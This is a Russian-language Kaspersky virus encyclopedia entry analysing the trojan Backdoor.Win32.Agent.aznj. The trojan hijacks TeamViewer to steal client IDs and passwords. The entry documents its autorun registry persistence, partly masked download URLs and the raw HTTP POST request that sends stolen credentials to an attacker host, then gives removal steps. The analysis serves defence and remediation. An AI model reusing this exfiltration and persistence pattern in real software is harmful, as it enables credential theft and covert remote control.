Russian
Интернет находится в нормальном состоянии, крупных эпидемий и других серьезных инцидентов службой мониторинга «Лаборатории Касперского» не зафиксировано. Уровень опасности: 1

Backdoor.Win32.Agent.aznj

Время детектирования 18 авг 2010 12:13 MSK
Время выпуска обновления 18 авг 2010 20:27 MSK
Описание опубликовано 25 окт 2010 13:16 MSK

Экспертное описание Автоматическое описание
Это описание создано экспертами «Лаборатории Касперского» и содержит наиболее точную информацию о данном детектируемом объекте.

Технические детали
Деструктивная активность
Рекомендации по удалению

Технические детали

Троянская программа, которая без ведома пользователя загружает из сети Интернет другие вредоносные программы и запускает их на выполнение. Программа является динамической библиотекой Windows (PE EXE-файл). Имеет размер 43520 байт. Написана на С++.

Инсталляция

После запуска троянец копирует свой исполняемый файл в каталог хранения файлов текущего пользователя под именем:

%Temp%\msbuild\mscpl.exe
Для автоматического запуска при каждом следующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MsCpl"="%Temp%\msbuild\mscpl.exe"

Деструктивная активность

Для получения удаленного управления над компьютером загружает модифицированные компоненты приложения "TeamViewer" по следующим URL:

http://s***to.net/engine/tv/msbuild.exe
Данный файл имеет размер 5253120 байт.
http://sv***to.net/engine/tv/TV.dll
Данный файл имеет размер 107816 байт. Оригинальная библиотека "TeamViewer".
http://sv***to.net/engine/tv/TV_en.dll
Данный файл имеет размер 9216 байт.
http://sv***to.net/engine/tv/TeamViewer_Resource_en.dll
Данный файл имеет размер 832808 байт. Оригинальная библиотека TeamViewer.

Загруженные файлы сохраняются во временный каталог текущего пользователя Windows под соответствующими именами:

%Temp%\msbuild\msbuild.exe
%Temp%\msbuild\TeamViewer_Resource_en.dll
%Temp%\msbuild\TV.dll
%Temp%\msbuild\TV_en.dll
Далее запускает на выполнение файл "msbuild.exe". Используя библиотеку "TV_en.dll", троянец ищет и скрывает окна с именами класса "TeamViewer", "#32770", "Sponsored session", а также похищает уникальный ID и пароль клиентского приложения TeamViewer. Похищенные данные сохраняются в текстовый файл:
%WorkDir%\msbuild.txt
Затем, в отдельных потоках, выполняет следующие действия:
  • Ищет файл:
    %Program Files%\Common Files\wcsheduler.exe
    %Program Data%\wcsheduler.exe
    
  • Выполняет поиск окон с именами класса "TeamViewer", "Sponsored session", "ATL:", "Remote Reboot". В данных окнах, из полей ввода, похищает информацию, а именно – ID клиента "TeamViewer", пароль.
  • Определяет месторасположение курсора мыши.
  • Используя метод POST, отправляет похищенные данные на сервер злоумышленника:
    POST /tv/tvadmin.php HTTP/1.1
    Host: be***op.net
    User-Agent: Opera/9.80 Pesto/2.2.15
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    
    id=<X>&tvac=<ID клиента:пароль>&away=0
    
где X – числа сгенерированные троянцем, например _6_203_-872070089 или _6_203_1886890347. В ответ от сервера получает строку:
normik
После этого троянец сохраняет свой оригинальный файл под именем:
%WorkDir%\err.log
и устанавливает файлу атрибут "Временный" (TEMPORARY).


Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. При помощи Диспетчера задач завершить троянские процессы "mscpl.exe" и "msbuild.exe".
  2. Удалить параметр ключа системного реестра:
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "MsCpl"="%Temp%\msbuild\mscpl.exe"
    
  3. Удалить каталог со всеми файлами:
    %Temp%\msbuild
  4. Удалить файлы:
    %WorkDir%\err.log
    %WorkDir%\msbuild.txt
    
  5. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).


Bookmark and Share
Закладки
Backdoor

Вредоносная программа, предназначенная для скрытого удалённого управления злоумышленником пораженным компьютером. По своей функциональности бэкдоры во многом напоминают различные системы администрирования, разрабатываемые и распространяемые фирмами-производителями программных продуктов.

Эти вредоносные программы позволяют делать с компьютером всё, что в них заложил автор: принимать или отсылать файлы, запускать и уничтожать их, выводить сообщения, стирать информацию, перезагружать компьютер и т.д.

Представители этого типа вредоносных программ очень часто используются для объединения компьютеров-жертв в так называемые «ботнеты», централизованно управляемые злоумышленниками в злонамеренных целях.

Отдельно следует отметить группу бэкдоров, способных распространяться по сети и внедряться в другие компьютеры, как это делают сетевые черви. Отличает такие бэкдоры от червей то, что они распространяются по сети не самопроизвольно (как сетевые черви), а только по специальной команде «хозяина», управляющего данной копией троянской программы.


Другие модификации

Другие названия

Backdoor.Win32.Agent.aznj («Лаборатория Касперского») также известен как:

  • Trojan-Downloader.Win32.Genome.ayrr («Лаборатория Касперского»)
  • a variant of Win32/Agent.JCZSJJQ trojan (Nod32)
  • Trojan.Generic.4714885 (BitDef7)
  • Win32:Malware-gen (AVAST)
  • Trojan-Downloader.Win32.Genome (Ikarus)
  • Downloader.Generic10.OTL (AVG)
  • Downloader.BEAK (Norman)
  • Backdoor.Win32.Agent.aznj [AVP] (FSecure)